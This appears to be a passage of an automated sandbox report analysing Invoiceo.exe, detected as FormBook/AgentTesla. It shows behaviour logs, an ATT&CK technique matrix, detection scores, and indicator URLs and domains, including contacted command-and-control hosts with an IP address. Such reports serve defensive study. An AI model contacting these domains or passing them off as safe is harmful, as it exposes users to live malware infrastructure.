Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_00353C49 GetSystemTime,SystemTimeToFileTime,

26_2_00353C49

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 26_2_0033443C GetVersion,

26_2_0033443C

Source: C:\Users\user\Desktop\Invoiceo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	Valid Accounts1	Valid Accounts1	Disable or Modify Tools11	Credential API Hooking1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Scheduled Task/Job1	Access Token Manipulation1	Obfuscated Files or Information3	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Process Injection512	Software Packing3	Security Account Manager	System Information Discovery125	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Rootkit1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery451	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion141	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion141	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Invoiceo.exe	21%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\yYxmxiApi.exe	21%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.Invoiceo.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.rare-snare.com	0%	Avira URL Cloud	safe
http://www.analistaweb.net/csi/www.kontrey.com	0%	Avira URL Cloud	safe
http://www.nelivo.comReferer:	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.bahama-id.comReferer:	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	URL Reputation	safe
http://www.microsoft.co	0%	URL Reputation	safe
http://www.microsoft.co	0%	URL Reputation	safe
http://www.bermudesfcrasettlement.com/csi/	0%	Avira URL Cloud	safe
http://www.rare-snare.com/csi/www.analistaweb.net	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.wristaidmd.com/csi/	0%	Avira URL Cloud	safe
http://www.foodbyroyalbites.comReferer:	0%	Avira URL Cloud	safe
http://www.swim-maki.com/csi/	0%	Avira URL Cloud	safe
http://www.analistaweb.net	0%	Avira URL Cloud	safe
http://www.analistaweb.net/csi/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.ss01center.com/csi/www.naturaldesiproducts.com	0%	Avira URL Cloud	safe
http://www.nelivo.com/csi/	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.bioshope.online/csi/	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.analistaweb.netReferer:	0%	Avira URL Cloud	safe
http://www.foodbyroyalbites.com/csi/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.uspaypausa.com	0%	Avira URL Cloud	safe
http://www.wristaidmd.com/csi/www.nelivo.com	0%	Avira URL Cloud	safe
http://www.uspaypausa.com/csi/	0%	Avira URL Cloud	safe
http://www.uspaypausa.com/csi/www.ss01center.com	0%	Avira URL Cloud	safe
http://www.nelivo.com/csi/www.adtlive.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.naturaldesiproducts.com/csi/	0%	Avira URL Cloud	safe
http://www.bermudesfcrasettlement.com	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.swim-maki.com/csi/www.bermudesfcrasettlement.com	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.adtlive.comReferer:	0%	Avira URL Cloud	safe
http://www.foodbyroyalbites.com	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.bioshope.onlineReferer:	0%	Avira URL Cloud	safe
http://www.adtlive.com	0%	Avira URL Cloud	safe
http://www.bahama-id.com/csi/www.uspaypausa.com	0%	Avira URL Cloud	safe
http://www.swim-maki.comReferer:	0%	Avira URL Cloud	safe
http://www.adtlive.com/csi/	0%	Avira URL Cloud	safe
http://www.kontrey.com/csi/www.bahama-id.com	0%	Avira URL Cloud	safe
http://www.naturaldesiproducts.comReferer:	0%	Avira URL Cloud	safe
http://www.bermudesfcrasettlement.comReferer:	0%	Avira URL Cloud	safe
http://www.nelivo.com	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://www.ss01center.com/csi/	0%	Avira URL Cloud	safe
http://www.bahama-id.com/csi/	0%	Avira URL Cloud	safe
http://www.bioshope.online	0%	Avira URL Cloud	safe
http://www.swim-maki.com	0%	Avira URL Cloud	safe
http://www.tabuk24.com	0%	Avira URL Cloud	safe
http://www.kontrey.com	0%	Avira URL Cloud	safe
http://www.kontrey.comReferer:	0%	Avira URL Cloud	safe
http://www.foodbyroyalbites.com/csi/www.bioshope.online	0%	Avira URL Cloud	safe
http://www.wristaidmd.com	0%	Avira URL Cloud	safe
http://www.adtlive.com/csi/www.rare-snare.com	0%	Avira URL Cloud	safe
http://www.tabuk24.com/csi/?TTgLKx=uFNDtp4H1nDLCVd&mR-ptRI=N6ynhade2rGTzfH7Obdga9j8h7xnVmduHv/FNLw2V1/oBiufSguui3vD99XwSD3G2mHh	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.ss01center.comReferer:	0%	Avira URL Cloud	safe
http://www.tabuk24.comReferer:	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.naturaldesiproducts.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.tabuk24.com	154.207.58.218	true	true		unknown
www.swim-maki.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tabuk24.com/csi/?TTgLKx=uFNDtp4H1nDLCVd&mR-ptRI=N6ynhade2rGTzfH7Obdga9j8h7xnVmduHv/FNLw2V1/oBiufSguui3vD99XwSD3G2mHh	true	Avira URL Cloud: safe	unknown
www.swim-maki.com/csi/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.rare-snare.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.analistaweb.net/csi/www.kontrey.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nelivo.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.bahama-id.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000004.00000003.348127191.00000000090A2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.bermudesfcrasettlement.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rare-snare.com/csi/www.analistaweb.net	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wristaidmd.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.foodbyroyalbites.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.swim-maki.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.analistaweb.net	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.analistaweb.net/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	false		high
http://www.ss01center.com/csi/www.naturaldesiproducts.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nelivo.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.bioshope.online/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.analistaweb.netReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foodbyroyalbites.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.uspaypausa.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wristaidmd.com/csi/www.nelivo.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uspaypausa.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uspaypausa.com/csi/www.ss01center.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nelivo.com/csi/www.adtlive.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.naturaldesiproducts.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bermudesfcrasettlement.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.swim-maki.com/csi/www.bermudesfcrasettlement.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.adtlive.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.405129582.0000000004931000.00000004.00000001.sdmp	false		high
http://www.foodbyroyalbites.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/unguest	Invoiceo.exe	false		high
http://www.bioshope.onlineReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adtlive.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bahama-id.com/csi/www.uspaypausa.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	Invoiceo.exe	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.swim-maki.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adtlive.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kontrey.com/csi/www.bahama-id.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.naturaldesiproducts.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bermudesfcrasettlement.comReferer:	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nelivo.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000003.320382870.0000000004F91000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.325533885.0000000005112000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.333217488.00000000052FC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ss01center.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bahama-id.com/csi/	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bioshope.online	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.swim-maki.com	explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
